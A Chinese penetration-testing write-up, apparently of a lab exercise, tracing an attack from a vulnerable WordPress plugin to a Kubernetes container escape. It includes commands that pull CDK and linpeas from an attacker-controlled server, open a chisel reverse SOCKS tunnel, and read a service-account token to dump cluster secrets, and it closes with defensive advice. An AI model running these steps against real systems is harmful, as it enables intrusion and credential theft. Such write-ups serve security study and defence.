容器环境下的信息收集与横向移动技术分析<\/h1>

1. 初始入侵与容器识别<\/h2>

1.1 WordPress漏洞利用<\/h3>

目标识别：通过指纹识别确认目标系统为WordPress<\/li>
漏洞扫描：发现存在漏洞的插件版本，扫描时需携带有效token<\/li>
CVE查找：根据插件信息查找对应的CVE漏洞编号<\/li>
工具获取：从GitHub下载相关漏洞利用库<\/li>

利用成功：成功获取初始shell权限<\/li> <\/ul>

1.2 容器环境识别<\/h3>

识别特征：<\/strong><\/p>

用户名符合Kubernetes Pod命名格式<\/li>
环境变量中包含Kubernetes相关配置：

KUBERNETES_SERVICE_HOST<\/code><\/li>
KUBERNETES_SERVICE_PORT<\/code><\/li>
其他Kubernetes特有的环境变量<\/li> <\/ul> <\/li> <\/ul> 2. 容器内信息收集与工具使用<\/h2> 2.1 CDK工具部署<\/h3> # 在攻击机搭建Python HTTP服务<\/span> <\/span><\/span>python3 -m http.server 8080<\/span> <\/span><\/span> <\/span><\/span># 在容器内下载CDK工具<\/span> <\/span><\/span>wget http:\/\/攻击机IP:8080\/cdk_linux_amd64 <\/span><\/span>chmod +x cdk_linux_amd64 <\/span><\/span><\/code><\/pre>2.2 信息收集结果分析<\/h3> 通过CDK扫描发现关键信息：<\/p> 发现另外两个容器IP地址：10.43.2.241、10.43.2.242<\/li> 10.43.2.241开放5000端口，运行可疑服务<\/li> <\/ul> 3. 横向移动技术实现<\/h2> 3.1 服务探测与利用<\/h3> PHP CGI漏洞利用：<\/strong><\/p> <?<\/span>php<\/span> <\/span><\/span>\/\/ PHP脚本探测5000端口服务 <\/span><\/span><\/span><\/span>$response =<\/span> file_get_contents<\/span>('http:\/\/10.43.2.241:5000\/'<\/span>); <\/span><\/span>echo<\/span> $response; <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>发现关键信息：<\/strong><\/p> 目标服务为PHP CGI<\/li> 保留Windows功能特性<\/li> 存在可利用的CVE漏洞<\/li> <\/ul> 3.2 隧道建立与工具传输<\/h3> # 在攻击机启动隧道服务<\/span> <\/span><\/span>.\/chisel server -p 8080<\/span> --reverse <\/span><\/span> <\/span><\/span># 在容器内连接隧道<\/span> <\/span><\/span>.\/chisel client 攻击机IP:8080 R:1080:socks <\/span><\/span><\/code><\/pre>3.3 漏洞利用与权限提升<\/h3> 使用PHP CGI相关CVE进行漏洞利用<\/li> 成功获取第二个容器shell权限<\/li> 上传CDK工具进行深度扫描<\/li> <\/ul> 4. Kubernetes集群渗透<\/h2> 4.1 API Server访问<\/h3> 发现关键端点：<\/strong><\/p> 存在两个返回401状态的API端点<\/li> 需要有效的token进行认证<\/li> <\/ul> 4.2 Token获取与利用<\/h3> # 读取Service Account token<\/span> <\/span><\/span>cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token <\/span><\/span> <\/span><\/span># 将token存入变量<\/span> <\/span><\/span>export TOKEN=<\/span>$(<\/span>cat \/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token)<\/span> <\/span><\/span> <\/span><\/span># 使用token访问Kubernetes API<\/span> <\/span><\/span>curl -k -H "Authorization: Bearer <\/span>$TOKEN"<\/span> https:\/\/10.43.2.1:443\/api\/v1\/secrets <\/span><\/span><\/code><\/pre>4.3 Secrets信息提取<\/h3> 获取的敏感数据包括：<\/p> 数据库凭证（root用户和业务用户）<\/li> WordPress管理员密码<\/li> 人工创建的用户级口令（用于SSH、CI\/CD等）<\/li> <\/ul> Base64解码后的关键信息：<\/strong><\/p> 数据库root用户凭证<\/li> 数据库业务用户凭证<\/li> WordPress管理员密码<\/li> SSH访问凭证<\/li> 应用配置密码<\/li> <\/ol> 5. 节点权限提升与容器逃逸<\/h2> 5.1 主机访问<\/h3> 使用获取的凭证成功登录宿主机普通用户账户<\/p> 5.2 权限分析<\/h3> # 下载提权枚举工具<\/span> <\/span><\/span>wget http:\/\/攻击机IP:8080\/linpeas.sh <\/span><\/span> <\/span><\/span># 权限检查<\/span> <\/span><\/span>sudo -l <\/span><\/span><\/code><\/pre>5.3 runc容器逃逸<\/h3> 利用条件：<\/strong><\/p> 存在debug功能<\/li> 属于root账户权限<\/li> 使用runc容器运行时<\/li> <\/ul> 逃逸步骤：<\/strong><\/p> 创建专用目录<\/li> <\/ol> mkdir \/tmp\/escape <\/span><\/span>cd \/tmp\/escape <\/span><\/span><\/code><\/pre> 创建恶意配置文件<\/li> <\/ol> { <\/span><\/span> "type"<\/span>: "..."<\/span>, <\/span><\/span> "path"<\/span>: "shellss"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre> 创建执行文件<\/li> <\/ol> echo "\/bin\/bash"<\/span> > shellss <\/span><\/span>chmod +x shellss <\/span><\/span><\/code><\/pre> 利用debug功能执行逃逸<\/li> <\/ol> 需要提供administrative password<\/li> 使用之前收集的密码进行尝试<\/li> 成功获取root权限<\/li> <\/ul> 6. 技术要点总结<\/h2> 6.1 关键攻击路径<\/h3> WordPress插件漏洞 → 初始访问<\/li> 容器内信息收集 → 发现内部服务<\/li> PHP CGI漏洞 → 横向移动<\/li> Kubernetes Token利用 → 集群权限提升<\/li> runc漏洞 → 容器逃逸和root权限获取<\/li> <\/ol> 6.2 防御建议<\/h3> 及时更新WordPress插件<\/li> 限制容器权限和能力<\/li> 加强Service Account权限控制<\/li> 定期更新容器运行时<\/li> 实施网络策略限制横向移动<\/li> <\/ul> 6.3 工具使用总结<\/h3> CDK<\/strong>：容器环境信息收集和漏洞利用<\/li> Chisel<\/strong>：隧道建立和代理转发<\/li> LinPEAS<\/strong>：Linux权限提升枚举<\/li> 自定义脚本：特定环境下的漏洞利用<\/li> <\/ul> 此攻击链展示了从Web应用漏洞到完全控制Kubernetes集群的完整过程，强调了容器环境下安全防护的多层性和复杂性。<\/p>